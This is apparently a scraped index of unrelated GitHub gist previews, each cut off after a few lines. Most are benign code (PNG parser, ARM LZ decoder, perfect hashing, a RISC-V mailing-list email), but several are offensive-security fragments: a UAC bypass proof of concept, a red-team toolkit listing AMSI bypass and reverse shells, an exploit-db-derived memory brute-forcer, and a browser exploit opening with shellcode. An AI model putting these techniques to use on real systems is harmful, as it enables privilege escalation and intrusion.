antonioCoco

/*
	TaskManagerSecret

	Author: @splinter_code

	This is a very ugly POC for a very unreliable UAC bypass through some UI hacks.
	The core of this hack is stealing and using a token containing the UIAccess flag set.
	A trick described by James Forshaw, so all credits to him --> https://www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
	From there it uses a task manager "feature" to run a new High IL cmd.exe.
	This has been developed only for fun and shouldn't be used due to its high unreliability.

smourier

#define _AFXDLL
#include <WinSock2.h> // MFC...
#include <windows.h>
#include <afxwin.h> // CBitmap
#include <atlbase.h>
#include <atlcom.h> // CComPtr
#include <d2d1.h>
#include <d2d1_3.h> // ID2D1DeviceContext5
#include <wincodec.h> // Wic

z0rs

Red Teaming tool

• General usefull Powershell Scripts
• AMSI Bypass restriction Bypass
• Payload Hosting
• Network Share Scanner
• Lateral Movement
• Reverse Shellz
• POST Exploitation

DavidBuchanan314

import zlib
import io
import sys

PNG_MAGIC = b"\x89PNG\r\n\x1a\n"

def parse_png_chunk(stream):
	size = int.from_bytes(stream.read(4), "big")
	ctype = stream.read(4)
	body = stream.read(size)

ManDeJan

.cpu cortex-m3
.syntax unified @ this is important, you won't get most of thumb-2 otherwise

.text
@ this file contains a assembly version of a lz decoder for cpse1 at the hogeschool utrecht
@ it's done in 15 instructions / 40 bytes, 20% less then what the best compiler did :)

@ compiler benchmarks
@ clang (trunk)
@ -O0 124 bytes

aaaddress1

// memBruteforce.cpp by [email protected]
// brute search loaded moudules in memory
// rewrite from https://www.exploit-db.com/exploits/45293
#include <Windows.h>
#include <iostream>
#pragma warning(disable:4996)

bool isMemExist(size_t addr) {
    int retv;
    __asm {

EvanMcBroom

// Copyright (C) 2022 Evan McBroom
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
// 
// The above copyright notice and this permission notice shall be included in

wdormann

<script>
    function gc() {
        for (var i = 0; i < 0x80000; ++i) {
            var a = new ArrayBuffer();
        }
    }

let shellcode = [

// Move x18 to x28 (TEB)

mjosaarinen

Markku-Juhani O. Saarinen <[email protected]>
	
Apr 11, 2021, 9:32 PM (2 days ago)
	
to [email protected], [email protected].

Hello Bitmanip and Krypto,

A colleague asked: "Why CMOV is not on the constant-time Zkt list -- the Bitmanip specification says that it is helpful for cryptography?" https://github.com/rvkrypto/riscv-zkt-list

pervognsen

# Hash, displace, and compress: http://cmph.sourceforge.net/papers/esa09.pdf
# This is expected linear time for any seeded hash function that acts like a random hash function (universality isn't enough).
# (Actually, the code as written is O(n log n) when targeting 100% load. It's O(n) when targeting any smaller load factor.)
# You can make keys_per_bucket higher than the default of 4 but construction time will start to increase dramatically.
# The paper this is based on compresses the seeds (so the fact that the algorithm tries seeds in increasing order is important)
# which brings the representation size close to the information-theoretical minimum. I don't do any of that here, but it could
# be done as a postprocess.
def make_perfect_hash(keys, load_factor=1.0, keys_per_bucket=4, rhash=murmurhash, max_seed=1000000):
    m = int(len(keys) / load_factor)
    r = int(len(keys) / keys_per_bucket)